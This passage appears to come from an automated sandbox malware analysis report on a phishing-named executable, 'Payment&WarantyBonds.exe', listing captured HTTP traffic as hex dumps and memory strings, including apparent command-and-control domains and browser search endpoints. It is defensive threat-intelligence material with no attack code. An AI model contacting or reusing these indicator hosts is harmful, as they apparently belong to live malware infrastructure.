2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:40:17 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:40:20 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:40:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HaBDA6u5OAiLgOO3iitkTWt7Gzk3nlOpUZdWmStgVbKi76Dk70lYeB8WTo4t%2FTwQoV5A9CUBjDtEMHJ3XbrGWzR47KgsUF5nr7uiegTWjJdJIm%2BfR4PfpnWzcPuiLofp4LcwS35M%2FkrxAA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Content-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1754&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:40:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n44l2GrAdPQ0zSKfCFTruPRhdLcZAiL19XAF4s6HM7j7Z%2Boipc77%2B7F3rlGczdjpJW3B2eO8Vv4FUGBbscOKfTOLkrLMZz42oCtvP8btoq34B6A%2B2rycEueLohmVCJG3OUKKpI49YwfMqg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Content-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:40:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WDU6WvB3C9tJ0sIY%2F0d3rdEIqTy%2FKs0g9Lt4eeJVeDrQ5Ha11t9Jz9AARlBhiOIPwccihoKurDxtnYN4%2BE3Ml4IFyEPmz1WgXJ1JCouZnvs4Lu8cEfCM0HzSzhVYij8E0%2FFYX2yqjDOGw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Content-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1970&sent=2&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10841&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:40:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6rb1Hsqw0fAtJt7j%2FD5yS3KpWDyWwmpQnXJ7Fcdjx2RIKZrujqcP6ywLD5tAyhsEc9dB6nSI%2Fzn%2BC3fX0svUGjgIe%2Fi49S%2BfcB8TP%2BvniLhVq7aeTxKH3Uppy0vLyGm0qZVupMsFRtz1JA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=1808&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=474&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:40:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:40:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:40:59 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:41:01 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: systeminfo.exe, 00000007.00000002.4107343980.00000000062BA000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000003B6A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?78=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUp
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: lVlYtqLlYCJP.exe, 00000008.00000002.4108148789.0000000004AD4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.extrime1.shop
                Source: lVlYtqLlYCJP.exe, 00000008.00000002.4108148789.0000000004AD4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.extrime1.shop/jr4j/
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: systeminfo.exe, 00000007.00000002.4107343980.000000000594E000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000031FE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.stationseek.online/wd23?78=hRp9
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
